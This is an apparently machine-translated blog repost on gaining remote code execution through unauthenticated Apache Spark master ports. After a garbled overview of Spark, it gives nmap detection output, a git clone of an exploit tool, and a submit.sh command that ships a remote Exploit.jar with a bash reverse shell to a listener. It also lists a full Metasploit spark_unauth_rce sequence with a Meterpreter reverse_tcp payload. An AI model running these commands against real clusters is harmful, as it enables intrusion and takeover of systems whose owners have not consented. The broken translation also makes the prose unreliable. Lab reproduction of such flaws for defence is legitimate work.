About Spark
spark is a fast cluster to achieve universal computing platform. It is a universal memory parallel computing framework developed by the University of California, Berkeley AMP Lab, used to build large-scale, low-latency data analysis applications. It extends MapReduce computational model widely used. Support more efficient calculation mode, and stream including interactive query processing. A key feature is the ability to spark calculated in memory, in time-dependent disk complex calculations, Spark is still more efficient than MapReduce.
Spark unauthorized
Information Detection
nmap scan following a first port open, it is likely
6066/tcp open http Jetty 9.3.z-SNAPSHOT
8081/tcp open http Jetty 9.3.z-SNAPSHOT
8082/tcp open http Jetty 9.3.z-SNAPSHOT
Figure verification
Download attack or use components MSF
Download: git clone https://github.com/aRe00t/rce-over-spark.git
The jar tool instructions
./submit.sh 192.168.100.2:6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1"
Shell rebound effect:
msf Tools
msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit
Reproduced in: https: //www.cnblogs.com/KevinGeorge/p/10399844.html